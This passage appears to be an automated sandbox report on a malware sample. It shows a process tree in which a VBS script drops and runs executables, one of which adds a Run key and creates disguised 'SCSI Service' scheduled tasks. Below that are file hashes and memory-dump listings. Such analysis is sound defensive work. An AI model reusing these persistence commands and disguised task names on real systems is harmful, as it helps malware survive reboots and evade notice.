- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rlifexonjiantfxwzaeufs.vbs"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Ksbonyprod.exe"C:\Users\Admin\AppData\Local\Temp\Ksbonyprod.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 207⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\ys.exeC:\Users\Admin\AppData\Local\Temp\ys.exe5⤵
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "SCSI Service" /xml "C:\Users\Admin\AppData\Local\Temp\tmp615B.tmp"6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "SCSI Service Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp6321.tmp"6⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
66382a4ca6c4dcf75ce41417d44be93e
SHA18132cbef1c12f8a89a68a6153ade4286bf130812
SHA256a70acce0f4c6ab59b88ce79d84c38d4abffe19b72b033250499b17d788a2db56
SHA5122bf66f2850f4a65220085c55a5b3c8866453104d78fe516e5bd6e3e47df783062ce4ea10de580f2eb0274ac8c3ce71965201c49ef55a78f307731ccc8600aadc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
5f640bd48e2547b4c1a7421f080f815f
SHA1a8f4a743f5b7da5cba7b8e6fb1d7ad4d67fefc6a
SHA256916c83c7c8d059aea295523b8b3f24e1e2436df894f7fae26c47c9bad04baa9c
SHA512a6ac100a351946b1bbb40c98aeda6e16e12f90f81063aff08c16d4d9afec8ed65c2cbcf25b42946627d67653f75740b1137dab625c99e9492ba35aba68b79a8e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
65b28b7f713710549406ff847a44a177
SHA104fb15b859dce252681c3041d87697af9024d192
SHA2568436b25bc6074a0c8a4feadbdb7e81ae3f38770cac11525824829383a7989a56
SHA512bf7a0b12da8e55771b2aa2344d335ac8b13b5f479b7ff82005061deb3158ee2ab1b5333969b3622e8ea3ae7cd562b2d1959aec97dc3efed3b728ddf35c31bdf0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
bb23d9f15f9602a56def45632822100f
SHA15a9f631d0e28f46108bea88139043dc3b0660dc4
SHA256c26e226efb4b23609dad61af3ed7eb30ff65b166ffa0157118acf11888dafa1a
SHA51247b9452d9e27ed4a9b480178c4368c159df36b54484b08b2e17eb10bb1f0d0c8c0161764fb993d6b80e51645b917642311903c3826e840d18db3bc5a37b3444e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
263e58658c7c65961c44ce8fdd63586c
SHA1b4e04a4def8ba9882177bc0801955db58237c975
SHA25634a1091b8feebf3966570ad52c3e50aa9d719d98d9f50d60822dddc2af43c8cb
SHA512a1edce48d15b2e03b0ded316733a9400d2e758be5e91f12249bd92349f385196c99c0d98bd92510fe7fbe9f0a57f83031f0f3b9e74edb3e519cf19a7247fc6ec
-
C:\Users\Admin\AppData\Local\Temp\Ksbonyprod.exeMD5
45e7f37bccbd54018df2b32d0f7acf58
SHA197f97e12f74ab4c50b4b9b40c561fb1cd889629c
SHA256561d3fee6276834f78aadbb7dec4025b1e7cb2102ce864fa5da037da086da67a
SHA51227a232ea644e497cd2a45241535cc9dd703fe72b9b8ca785bcfc2de98e9bd0ba16744c6e3e505afc214d9538ea900bdf5cf84f0cb7e5bfa54e86389295d2acee
-
C:\Users\Admin\AppData\Local\Temp\Ksbonyprod.exeMD5
45e7f37bccbd54018df2b32d0f7acf58
SHA197f97e12f74ab4c50b4b9b40c561fb1cd889629c
SHA256561d3fee6276834f78aadbb7dec4025b1e7cb2102ce864fa5da037da086da67a
SHA51227a232ea644e497cd2a45241535cc9dd703fe72b9b8ca785bcfc2de98e9bd0ba16744c6e3e505afc214d9538ea900bdf5cf84f0cb7e5bfa54e86389295d2acee
-
C:\Users\Admin\AppData\Local\Temp\Rlifexonjiantfxwzaeufs.vbsMD5
eca342e6e0def7cb71365b69223fa9d0
SHA1cd87cc22065c4250c8e32381104d9fd92a34892d
SHA256cfd25af24487bb69b97ea662d11d9bbed7fdbdcd8ac6c6ef201b9498fef5b69f
SHA5120899ddd601167fa720bc4f7194996d07e1f9ea38ff57c939ec23c8ece3f25fa6674210a25fae5d2ee5b30aff7e936fb53c34d8c2afdef4ff99f7c92c6462a196
-
C:\Users\Admin\AppData\Local\Temp\_Rlifexonjiantfxwzaeufs.vbsMD5
7002eb22ceea392ed6e52904a17ed59d
SHA15026935720bf88bf1d7f24f80ac2e77dc043cacd
SHA256ce4aaa692483b8efb6ddc068fc2295113996518faf14710876e820442de47232
SHA512f559401a4dc549c76de0729dc1b25129d5bef22b1d8f3692edc8d787194774b7fb20e3a13f13acad70f4be0aa03ef9df72cc39dbd60cbf821dbcabeec0f237e2
-
C:\Users\Admin\AppData\Local\Temp\tmp615B.tmpMD5
e48abc132ef1655f9b02d6be27db6a8e
SHA1d093a5e0ddbdc0e659446aa2a4e3d026fb8b0b1b
SHA25675a8016220f808bc17202846145efb39dd1410b794b449524de60803320b3b4b
SHA512ba824be5bda0b5b061108f50b9974ed2a38ed7ab158ccf4079d5dd21b004d3057e37bbb2fd55006747e241bcb67aa51bfd7fed17a9e5e81a7392296b721b3cbf
-
C:\Users\Admin\AppData\Local\Temp\tmp6321.tmpMD5
4e71faa3a77029484cfaba423d96618f
SHA19c837d050bb43d69dc608af809c292e13bca4718
SHA256c470f45efd2e7c4c5b88534a18965a78dce0f8e154d3e45a9d5569ad0e334bdb
SHA5126d014de41352f2b0b494d94cd58188791e81d4e53578d0722110b6827793b735e19c614877f25c61b26233dea1b5f1998ba1240bdc8fa04c87b7e64a4ca15fe0
-
memory/308-805-0x0000000007493000-0x0000000007494000-memory.dmpFilesize
4KB
-
memory/308-501-0x0000000000000000-mapping.dmp
-
memory/308-519-0x0000000007492000-0x0000000007493000-memory.dmpFilesize
4KB
-
memory/308-517-0x0000000007490000-0x0000000007491000-memory.dmpFilesize
4KB
-
memory/488-351-0x00000185ADCE0000-0x00000185ADCE1000-memory.dmpFilesize
4KB
-
memory/488-397-0x00000185ADA86000-0x00000185ADA88000-memory.dmpFilesize
8KB
-
memory/488-390-0x00000185ADDC0000-0x00000185ADDC1000-memory.dmpFilesize
4KB
-
memory/488-276-0x00000185ADD40000-0x00000185ADD41000-memory.dmpFilesize
4KB
-
memory/488-284-0x00000185ADA83000-0x00000185ADA85000-memory.dmpFilesize
8KB
-
memory/488-431-0x00000185ADA88000-0x00000185ADA89000-memory.dmpFilesize
4KB
-
memory/488-273-0x00000185ADB90000-0x00000185ADB91000-memory.dmpFilesize
4KB
-
memory/488-261-0x0000000000000000-mapping.dmp
-
memory/488-283-0x00000185ADA80000-0x00000185ADA82000-memory.dmpFilesize
8KB
-
memory/656-251-0x0000000000000000-mapping.dmp
-
memory/896-496-0x0000000004BE2000-0x0000000004BE3000-memory.dmpFilesize
4KB
-
memory/896-606-0x0000000004BE3000-0x0000000004BE4000-memory.dmpFilesize
4KB
-
memory/896-500-0x0000000008070000-0x0000000008071000-memory.dmpFilesize
4KB
-
memory/896-511-0x00000000089A0000-0x00000000089A1000-memory.dmpFilesize
4KB
-
memory/896-474-0x0000000000000000-mapping.dmp
-
memory/896-493-0x0000000004BE0000-0x0000000004BE1000-memory.dmpFilesize
4KB
-
memory/896-538-0x000000007E0E0000-0x000000007E0E1000-memory.dmpFilesize
4KB
-
memory/1844-468-0x000000000041E792-mapping.dmp
-
memory/1844-509-0x0000000005A10000-0x0000000005A29000-memory.dmpFilesize
100KB
-
memory/1844-467-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/1844-512-0x0000000005C10000-0x0000000005C13000-memory.dmpFilesize
12KB
-
memory/1844-473-0x0000000005880000-0x0000000005881000-memory.dmpFilesize
4KB
-
memory/1844-491-0x0000000005740000-0x0000000005C3E000-memory.dmpFilesize
5.0MB
-
memory/1844-508-0x0000000005A00000-0x0000000005A05000-memory.dmpFilesize
20KB
-
memory/2324-486-0x0000000000000000-mapping.dmp
-
memory/3052-498-0x0000000000000000-mapping.dmp
-
memory/3136-476-0x0000000000000000-mapping.dmp
-
memory/3136-479-0x00000000001F0000-0x00000000001F1000-memory.dmpFilesize
4KB
-
memory/3136-492-0x0000000004D40000-0x0000000004D8A000-memory.dmpFilesize
296KB
-
memory/3136-494-0x0000000004B10000-0x000000000500E000-memory.dmpFilesize
5.0MB
-
memory/3564-429-0x0000000005620000-0x0000000005621000-memory.dmpFilesize
4KB
-
memory/3564-434-0x0000000005120000-0x000000000561E000-memory.dmpFilesize
5.0MB
-
memory/3564-399-0x0000000000000000-mapping.dmp
-
memory/3564-461-0x0000000007540000-0x00000000075E2000-memory.dmpFilesize
648KB
-
memory/3564-427-0x0000000000640000-0x0000000000641000-memory.dmpFilesize
4KB
-
memory/3564-430-0x0000000004FE0000-0x0000000004FE1000-memory.dmpFilesize
4KB
-
memory/3564-432-0x0000000004FC0000-0x0000000004FC1000-memory.dmpFilesize
4KB
-
memory/3564-433-0x0000000007420000-0x00000000074F4000-memory.dmpFilesize
848KB
-
memory/3660-463-0x0000000000000000-mapping.dmp
-
memory/3740-447-0x0000000007CE0000-0x0000000007CE1000-memory.dmpFilesize
4KB
-
memory/3740-448-0x0000000008830000-0x0000000008831000-memory.dmpFilesize
4KB
-
memory/3740-444-0x0000000006F40000-0x0000000006F41000-memory.dmpFilesize
4KB
-
memory/3740-443-0x0000000007EE0000-0x0000000007EE1000-memory.dmpFilesize
4KB
-
memory/3740-442-0x0000000007E70000-0x0000000007E71000-memory.dmpFilesize
4KB
-
memory/3740-441-0x0000000007C20000-0x0000000007C21000-memory.dmpFilesize
4KB
-
memory/3740-440-0x0000000007510000-0x0000000007511000-memory.dmpFilesize
4KB
-
memory/3740-439-0x0000000007580000-0x0000000007581000-memory.dmpFilesize
4KB
-
memory/3740-438-0x0000000006DF0000-0x0000000006DF1000-memory.dmpFilesize
4KB
-
memory/3740-435-0x0000000000000000-mapping.dmp
-
memory/3740-462-0x0000000006F43000-0x0000000006F44000-memory.dmpFilesize
4KB
-
memory/3740-445-0x0000000006F42000-0x0000000006F43000-memory.dmpFilesize
4KB
-
memory/3740-449-0x00000000085D0000-0x00000000085D1000-memory.dmpFilesize
4KB
-
memory/3740-454-0x0000000009C10000-0x0000000009C11000-memory.dmpFilesize
4KB
-
memory/3740-455-0x00000000092E0000-0x00000000092E1000-memory.dmpFilesize
4KB
-
memory/3832-464-0x0000000000000000-mapping.dmp
-
memory/3940-115-0x00007FF648A70000-0x00007FF64C026000-memory.dmpFilesize
53.7MB
-
memory/3940-123-0x00007FFF5BD50000-0x00007FFF5DC45000-memory.dmpFilesize
31.0MB
-
memory/3940-124-0x00007FFF3BDC0000-0x00007FFF3BDD0000-memory.dmpFilesize
64KB
-
memory/3940-122-0x00007FFF5DC50000-0x00007FFF5ED3E000-memory.dmpFilesize
16.9MB
-
memory/3940-119-0x00007FFF3BDC0000-0x00007FFF3BDD0000-memory.dmpFilesize
64KB
-
memory/3940-118-0x00007FFF3BDC0000-0x00007FFF3BDD0000-memory.dmpFilesize
64KB
-
memory/3940-117-0x00007FFF3BDC0000-0x00007FFF3BDD0000-memory.dmpFilesize
64KB
-
memory/3940-116-0x00007FFF3BDC0000-0x00007FFF3BDD0000-memory.dmpFilesize
64KB